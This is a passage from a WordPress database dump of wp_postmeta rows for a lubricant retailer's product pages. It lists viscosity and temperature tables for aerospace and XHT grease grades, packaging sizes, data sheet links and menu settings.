INSERT INTO `wp_postmeta` VALUES (5199, 654, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td width="202">Aerospace Grade</td>\r\n<td style="text-align: center;" width="224">283AZ</td>\r\n<td style="text-align: center;" width="241">283AA</td>\r\n<td style="text-align: center;" width="213">283AB</td>\r\n<td style="text-align: center;" width="167">283AC</td>\r\n<td width="167">283AD</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">800</td>\r\n<td>1540</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 38°C</td>\r\n<td style="text-align: center;">24.7</td>\r\n<td style="text-align: center;">35</td>\r\n<td style="text-align: center;">86</td>\r\n<td style="text-align: center;">270</td>\r\n<td>502</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">4.2</td>\r\n<td style="text-align: center;">5.4</td>\r\n<td style="text-align: center;">10.5</td>\r\n<td style="text-align: center;">26</td>\r\n<td>44</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-57-149)</td>\r\n<td style="text-align: center;">(-51-177)</td>\r\n<td style="text-align: center;">(-40-232)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n<td>(-29-316)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5200, 654, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5201, 654, '318_custom_list_file', 'a:1:{s:32:"47de1b05166e3c7c549fe10942a90cff";a:3:{s:4:"name";s:13:"Aerospace PDF";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (5202, 654, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5203, 654, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5204, 654, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5205, 654, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5206, 654, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5207, 654, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5208, 654, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5209, 654, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5210, 654, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5211, 654, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5212, 654, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5213, 654, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5214, 654, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5215, 654, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5216, 654, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5217, 654, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5218, 654, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5219, 654, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5220, 654, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5221, 654, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5222, 654, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5223, 654, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5224, 654, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5225, 654, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5226, 654, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5227, 654, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5228, 654, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5258, 654, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5259, 654, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5260, 655, '_edit_lock', '1475016815:2'); 
INSERT INTO `wp_postmeta` VALUES (5261, 655, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5262, 655, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5263, 655, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5264, 655, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td width="202">Aerospace Grade</td>\r\n<td style="text-align: center;" width="224">283AZ</td>\r\n<td style="text-align: center;" width="241">283AA</td>\r\n<td style="text-align: center;" width="213">283AB</td>\r\n<td style="text-align: center;" width="167">283AC</td>\r\n<td width="167">283AD</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">800</td>\r\n<td>1540</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 38°C</td>\r\n<td style="text-align: center;">24.7</td>\r\n<td style="text-align: center;">35</td>\r\n<td style="text-align: center;">86</td>\r\n<td style="text-align: center;">270</td>\r\n<td>502</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">4.2</td>\r\n<td style="text-align: center;">5.4</td>\r\n<td style="text-align: center;">10.5</td>\r\n<td style="text-align: center;">26</td>\r\n<td>44</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-57-149)</td>\r\n<td style="text-align: center;">(-51-177)</td>\r\n<td style="text-align: center;">(-40-232)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n<td>(-29-316)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5265, 655, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td width="125">\r\n<p style="text-align: center;">Pail</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5266, 655, '318_custom_list_file', 'a:1:{s:32:"47de1b05166e3c7c549fe10942a90cff";a:3:{s:4:"name";s:0:"";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:13:"Aerospace PDF";}}'); 
INSERT INTO `wp_postmeta` VALUES (5267, 655, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5268, 655, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5269, 655, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5270, 655, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5271, 655, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5272, 655, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5273, 655, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5274, 655, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5275, 655, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5276, 655, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5277, 655, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5278, 655, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5279, 655, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5280, 655, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5281, 655, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5282, 655, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5283, 655, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5284, 655, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5285, 655, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5286, 655, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5287, 655, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5288, 655, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5289, 655, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5290, 655, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5291, 655, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5292, 655, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5293, 655, '_product_image_gallery', '374,378,380,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5323, 655, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5324, 655, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5325, 656, '_edit_lock', '1475016908:2'); 
INSERT INTO `wp_postmeta` VALUES (5326, 656, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5327, 656, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5328, 656, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5329, 656, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td width="202">Aerospace Grade</td>\r\n<td style="text-align: center;" width="224">283AZ</td>\r\n<td style="text-align: center;" width="241">283AA</td>\r\n<td style="text-align: center;" width="213">283AB</td>\r\n<td style="text-align: center;" width="167">283AC</td>\r\n<td width="167">283AD</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">800</td>\r\n<td>1540</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 38°C</td>\r\n<td style="text-align: center;">24.7</td>\r\n<td style="text-align: center;">35</td>\r\n<td style="text-align: center;">86</td>\r\n<td style="text-align: center;">270</td>\r\n<td>502</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">4.2</td>\r\n<td style="text-align: center;">5.4</td>\r\n<td style="text-align: center;">10.5</td>\r\n<td style="text-align: center;">26</td>\r\n<td>44</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-57-149)</td>\r\n<td style="text-align: center;">(-51-177)</td>\r\n<td style="text-align: center;">(-40-232)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n<td>(-29-316)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5330, 656, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td width="125">\r\n<p style="text-align: center;">Pail</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5331, 656, '318_custom_list_file', 'a:1:{s:32:"47de1b05166e3c7c549fe10942a90cff";a:3:{s:4:"name";s:0:"";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:13:"Aerospace PDF";}}'); 
INSERT INTO `wp_postmeta` VALUES (5332, 656, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5333, 656, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5334, 656, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5335, 656, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5336, 656, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5337, 656, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5338, 656, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5339, 656, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5340, 656, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5341, 656, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5342, 656, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5343, 656, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5344, 656, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5345, 656, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5346, 656, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5347, 656, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5348, 656, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5349, 656, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5350, 656, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5351, 656, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5352, 656, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5353, 656, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5354, 656, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5355, 656, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5356, 656, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5357, 656, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5358, 656, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5388, 656, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5389, 656, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5391, 659, '_edit_lock', '1475691661:2'); 
INSERT INTO `wp_postmeta` VALUES (5392, 659, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5393, 659, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5394, 659, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5395, 659, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: left;" width="202">Grade</td>\r\n<td style="text-align: center;" width="224">Thickener</td>\r\n<td style="text-align: center;" width="241">Viscosity (cSt) @ 40°C</td>\r\n<td style="text-align: center;" width="213">Viscosity (cSt) @ 100°C</td>\r\n<td style="text-align: center;" width="167">Viscosity (cSt) @ 200°C</td>\r\n<td style="text-align: center;" width="167">Anti-Corrosion Additive</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-S</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">46</td>\r\n<td style="text-align: center;">6.8</td>\r\n<td style="text-align: center;">No</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-SX</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">738</td>\r\n<td style="text-align: center;">65</td>\r\n<td style="text-align: center;">8.8</td>\r\n<td style="text-align: center;">No</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-AC</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">46</td>\r\n<td style="text-align: center;">6.8</td>\r\n<td style="text-align: center;">Yes</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-ACX</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">738</td>\r\n<td style="text-align: center;">65</td>\r\n<td style="text-align: center;">8.8</td>\r\n<td style="text-align: center;">Yes</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-BD</td>\r\n<td style="text-align: center;">Non-melting</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">46</td>\r\n<td style="text-align: center;">6.8</td>\r\n<td style="text-align: center;">No</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-BDX</td>\r\n<td style="text-align: center;">Non-melting</td>\r\n<td style="text-align: center;">738</td>\r\n<td style="text-align: center;">65</td>\r\n<td style="text-align: center;">8.8</td>\r\n<td style="text-align: center;">No</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-BDZ</td>\r\n<td style="text-align: center;">Non-melting</td>\r\n<td style="text-align: center;">1023</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">11.4</td>\r\n<td style="text-align: center;">No</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224">XHT-S</td>\r\n<td style="text-align: center;" width="241">XHT-SX</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Temperature Range</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">(-200-300)</td>\r\n<td style="text-align: center;">(-10-300)</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">(-4-572)</td>\r\n<td style="text-align: center;">(14-572)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (5396, 659, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td width="125">\r\n<p style="text-align: center;">Pail</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5397, 659, '318_custom_list_file', 'a:1:{s:32:"9ad73b56f8e0fb40e93cb4ce5090eddb";a:3:{s:4:"name";s:7:"XHT PDF";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/XHT-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (5398, 659, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5399, 659, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5400, 659, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5401, 659, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5402, 659, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5403, 659, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5404, 659, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5405, 659, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5406, 659, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5407, 659, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5408, 659, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5409, 659, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5410, 659, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5411, 659, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5412, 659, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5413, 659, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5414, 659, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5415, 659, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5416, 659, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5417, 659, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5418, 659, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5419, 659, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5420, 659, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5421, 659, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5422, 659, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5423, 659, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5424, 659, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5425, 659, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5426, 659, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5427, 659, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (5428, 659, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5429, 659, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5430, 659, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (5431, 659, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (5432, 659, '_ywtm_content_tab_description', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224">XHT-S</td>\r\n<td style="text-align: center;" width="241">XHT-SX</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Temperature Range</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">(-200-300)</td>\r\n<td style="text-align: center;">(-10-300)</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">(-4-572)</td>\r\n<td style="text-align: center;">(14-572)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5437, 662, '_edit_lock', '1471898069:1'); 
INSERT INTO `wp_postmeta` VALUES (5438, 662, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (5441, 664, '_edit_lock', '1488307101:2'); 
INSERT INTO `wp_postmeta` VALUES (5442, 664, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (5443, 664, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (5453, 666, '_aioseop_description', 'Krytox & Miller-Stephenson related articles'); 
INSERT INTO `wp_postmeta` VALUES (5454, 666, '_aioseop_title', 'Articles '); 
INSERT INTO `wp_postmeta` VALUES (5455, 666, '_aioseop_menulabel', 'Articles'); 
INSERT INTO `wp_postmeta` VALUES (5456, 666, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (5457, 666, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (5458, 666, '_menu_item_object_id', '664'); 
INSERT INTO `wp_postmeta` VALUES (5459, 666, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (5460, 666, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (5461, 666, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (5462, 666, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (5463, 666, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (5487, 662, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (5488, 670, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (5489, 670, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (5490, 670, '_menu_item_object_id', '664'); 
INSERT INTO `wp_postmeta` VALUES (5491, 670, '_menu_item_object', 'page'); 
